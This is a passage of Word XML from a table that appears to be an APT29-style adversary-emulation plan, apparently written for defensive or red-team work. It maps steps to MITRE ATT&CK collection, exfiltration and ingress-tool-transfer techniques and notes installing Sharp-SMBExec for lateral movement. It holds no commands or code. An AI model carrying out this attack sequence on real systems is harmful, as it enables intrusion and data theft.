          <w:p w14:paraId="19537AB5" w14:textId="4F8E3AEE" w:rsidR="000C0ACD" w:rsidRDefault="00C335AD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="008135C1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15D32B8C" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41D48E15" w14:textId="36D5D1E0" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32973052" w14:textId="57D4449C" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="00ED0542" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D2586F6" w14:textId="4F611B44" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="00D70BED" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D70BED">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[3] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F6445E" w:rsidRPr="005B3D45" w14:paraId="69590E43" w14:textId="77777777" w:rsidTr="00F24917">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="312E982D" w14:textId="7ADBC294" w:rsidR="00F6445E" w:rsidRDefault="00F6445E" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6390CA6A" w14:textId="50FDCF58" w:rsidR="00F6445E" w:rsidRDefault="00F6445E" w:rsidP="00F2491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0009 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44B23D11" w14:textId="645BF66B" w:rsidR="00F6445E" w:rsidRPr="008135C1" w:rsidRDefault="00F6445E" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F6445E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F6445E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1213 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F6445E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Data from Information Repositories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04DD98FC" w14:textId="3AFAA3E8" w:rsidR="00F6445E" w:rsidRDefault="00F6445E" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4442ACED" w14:textId="77777777" w:rsidR="00F6445E" w:rsidRPr="005B3D45" w:rsidRDefault="00F6445E" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CF0CE79" w14:textId="3C6ECF47" w:rsidR="00F6445E" w:rsidRDefault="00F6445E" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D2DD1A5" w14:textId="4B0878A9" w:rsidR="00F6445E" w:rsidRDefault="00F6445E" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71D0910A" w14:textId="1939684F" w:rsidR="00F6445E" w:rsidRDefault="00F6445E" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[3] Attacker able to collect data via this account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008135C1" w:rsidRPr="005B3D45" w14:paraId="75C48831" w14:textId="77777777" w:rsidTr="00F24917">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23AF62CC" w14:textId="148DD6E6" w:rsidR="008135C1" w:rsidRDefault="008135C1" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0061586D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A6DEAE7" w14:textId="187640CD" w:rsidR="008135C1" w:rsidRPr="005B3D45" w:rsidRDefault="008135C1" w:rsidP="00F2491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w:t>
            </w:r>
            <w:r w:rsidR="002F0F12">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">10 </w:t>
            </w:r>
            <w:r w:rsidR="00150521">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00150521">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05D95BA4" w14:textId="591C0E8D" w:rsidR="008135C1" w:rsidRPr="005B3D45" w:rsidRDefault="008135C1" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008135C1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1048.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008135C1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Exfiltration Over Alternative Protocol&gt;:Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E9D4D22" w14:textId="6D2CC820" w:rsidR="008135C1" w:rsidRDefault="008135C1" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00EC7E44">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73A51825" w14:textId="77777777" w:rsidR="008135C1" w:rsidRPr="005B3D45" w:rsidRDefault="008135C1" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F9C3AF4" w14:textId="2840047F" w:rsidR="008135C1" w:rsidRDefault="008135C1" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="478E71B1" w14:textId="002C8EDC" w:rsidR="008135C1" w:rsidRDefault="008135C1" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EAC5EFB" w14:textId="05713B34" w:rsidR="008135C1" w:rsidRPr="00CD088D" w:rsidRDefault="008135C1" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration of data (following above)</w:t>
            </w:r>
            <w:r w:rsidR="00F6445E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>. Known procedure from [8]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007931BE" w:rsidRPr="005B3D45" w14:paraId="5FD552D3" w14:textId="77777777" w:rsidTr="00F24917">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27DB54B2" w14:textId="7FE509F6" w:rsidR="007931BE" w:rsidRPr="005B3D45" w:rsidRDefault="007931BE" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0061586D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="244CEF62" w14:textId="77777777" w:rsidR="007931BE" w:rsidRPr="005B3D45" w:rsidRDefault="007931BE" w:rsidP="00F24917">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463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3688375A" w14:textId="77777777" w:rsidR="007931BE" w:rsidRPr="005B3D45" w:rsidRDefault="007931BE" w:rsidP="00F24917">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63" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22C04CBE" w14:textId="105AAE99" w:rsidR="007931BE" w:rsidRPr="005B3D45" w:rsidRDefault="007931BE" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00EC7E44">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="464CCEB8" w14:textId="77777777" w:rsidR="007931BE" w:rsidRPr="005B3D45" w:rsidRDefault="007931BE" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BA33D71" w14:textId="77777777" w:rsidR="007931BE" w:rsidRPr="005B3D45" w:rsidRDefault="007931BE" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1078CE4D" w14:textId="77777777" w:rsidR="007931BE" w:rsidRPr="005B3D45" w:rsidRDefault="007931BE" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="058F26EF" w14:textId="0A4E5403" w:rsidR="007931BE" w:rsidRPr="005B3D45" w:rsidRDefault="007931BE" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD088D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Communication leading to installation of Sharp-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>SMBExec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007931BE" w:rsidRPr="00B857D7" w14:paraId="71A5F753" w14:textId="77777777" w:rsidTr="00F24917">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E75529E" w14:textId="1E50184D" w:rsidR="007931BE" w:rsidRDefault="007931BE" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0061586D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15EF45A0" w14:textId="77777777" w:rsidR="007931BE" w:rsidRPr="00B857D7" w:rsidRDefault="007931BE" w:rsidP="00F24917">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463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="174ED6E1" w14:textId="77777777" w:rsidR="007931BE" w:rsidRPr="00527381" w:rsidRDefault="007931BE" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00943C83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00943C83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00943C83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="469641B7" w14:textId="5BB1D614" w:rsidR="007931BE" w:rsidRDefault="007931BE" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00EC7E44">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D63EA5E" w14:textId="77777777" w:rsidR="007931BE" w:rsidRPr="00B857D7" w:rsidRDefault="007931BE" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D22C64E" w14:textId="77777777" w:rsidR="007931BE" w:rsidRDefault="007931BE" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A1E73FB" w14:textId="77777777" w:rsidR="007931BE" w:rsidRDefault="007931BE" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D542F44" w14:textId="4D23BF8A" w:rsidR="007931BE" w:rsidRDefault="007931BE" w:rsidP="00F24917">
            <w:r>
              <w:t>[3] Install Sharp-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SMBExec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> - </w:t>
            </w:r>
            <w:r w:rsidRPr="007931BE">
              <w:t xml:space="preserve">A tool to execute a command on a remote machine using </w:t>
            </w:r>
            <w:r w:rsidRPr="007931BE">
              <w:lastRenderedPageBreak/>
              <w:t>SM</w:t>
            </w:r>
            <w:r>
              <w:t>B (this will be used to achieve lateral movement in</w:t>
            </w:r>
            <w:r w:rsidR="002F6EB0">
              <w:t xml:space="preserve"> APT29_004)</w:t>
            </w:r>
            <w:r w:rsidR="00D6716E">
              <w:t xml:space="preserve">. Similar </w:t>
            </w:r>
            <w:r w:rsidR="00EC5040">
              <w:t>behaviour</w:t>
            </w:r>
            <w:r w:rsidR="00100375">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00EC5040">
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00100375">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D6716E">
              <w:t xml:space="preserve">tool usage also noted in </w:t>
            </w:r>
            <w:r w:rsidR="00323032">
              <w:t xml:space="preserve">use of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00323032">
              <w:t>PSExec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00323032">
              <w:t xml:space="preserve"> [8]</w:t>
            </w:r>
            <w:r w:rsidR="00D6716E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E545CD" w:rsidRPr="005B3D45" w14:paraId="3914DB73" w14:textId="77777777" w:rsidTr="00F24917">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
